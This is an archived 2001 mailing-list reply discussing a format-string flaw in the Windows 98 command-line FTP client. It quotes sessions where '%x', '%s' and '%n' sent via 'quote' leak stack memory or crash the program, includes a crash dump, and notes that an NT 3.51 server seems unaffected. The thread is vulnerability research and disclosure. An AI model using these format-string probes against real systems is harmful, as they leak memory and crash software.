Vulnerability Development mailing list archives

Re: Microsoft FTP Program

From: "Eric D. Williams" <eric () INFOBRO COM>
Date: Fri, 23 Mar 2001 09:03:26 -0500

While this may work on newer versions of the FTP server (that link to inetinfo) 
it seems older versions (3.51) are not vulnerable.  Interesting, output from 
the 500 response may be worth a little exploration though.


220 server Windows NT FTP Server (Version 3.51).
230 Anonymous user logged in as ftp (guest access).
ftp> quote 0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x
500 
'0x16382d0.0x16394d0.0x0.0x78257830.0x2578302e.0x78302e78.0x302e7825.0x2e782
578': command not understood
ftp> quote %s
500 'ic?'': command not understood
ftp> quote %n
500 '': command not understood
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
.
..
pub
Security
users
226 Transfer complete.
39 bytes received in 0.00 seconds (39000.00 Kbytes/sec)
ftp> quit

Eric Williams, Pres.
Information Brokers, Inc.    Phone: +1 202.889.4395
http://www.infobro.com/        Fax: +1 202.889.4396
               mailto:eric () infobro com
           For More Info: info () infobro com
                    PGP Public Key
   http://new.infobro.com/KeyServ/EricDWilliams.asc
Finger Print: 1055 8AED 9783 2378 73EF  7B19 0544 A590 FF65 B789

On Wednesday, March 21, 2001 7:48 AM, SteeLe [SMTP:steeLe () PRIVACYX COM] wrote:

While playin around in the Microsoft FTP program that came with Windows 98 I
came across the following :

Connected to l33t host.
220 FTP server (Version 6.00LS) ready.
User (somewhere()): ftp
331 Guest login ok, send your email address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> quote
Command line to send
Usage: quote line to send.
ftp> quote 0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x.0x%x
500
'0X7800BB4B.0X10072B8.0X1008820.0X0.0X56F3E8.0X78257830.0X2578302E.0X78302E7
8': command not understood.
ftp> quote %s
500 '+(|X+++YX++_ZX++|QX+++VX++ÇQX++êSX+++¦X++_ÄX++4òX+++òX++-
VX+++V
X+++VX+J_0___T__¦W_Y__T_Uï_QQVW+-¦XH': command not understood.
ftp> quote %n

And that crashed the program......

FTP caused an invalid page fault in
module KERNEL32.DLL at 0167:bff9d709.
Registers:
EAX=c00300f0 CS=0167 EIP=bff9d709 EFLGS=00010216
EBX=00000000 SS=016f ESP=0052feb8 EBP=00530154
ECX=00000000 DS=016f ESI=00690100 FS=1c2f
EDX=780376e8 ES=016f EDI=01001550 GS=0000
Bytes at CS:EIP:
53 8b 15 dc 9c fc bf 56 89 4d e4 57 89 4d dc 89
Stack dump:

I do know that the ftp program in most linux distros had this problem a while
back but who knew it would pass on to Windows.

Might not be important but someone should comment on this :)

SteeLe
 << File: ATT00001.htm >>

Current thread:

Microsoft FTP Program SteeLe (Mar 22)
- <Possible follow-ups>
- Re: Microsoft FTP Program Syzop (Mar 23)
- Re: Microsoft FTP Program Jose Nazario (Mar 23)
- Re: Microsoft FTP Program Eric D. Williams (Mar 23)
- Re: Microsoft FTP Program Bruno Lustosa (Mar 23)
- Re: Microsoft FTP Program Eric D. Williams (Mar 25)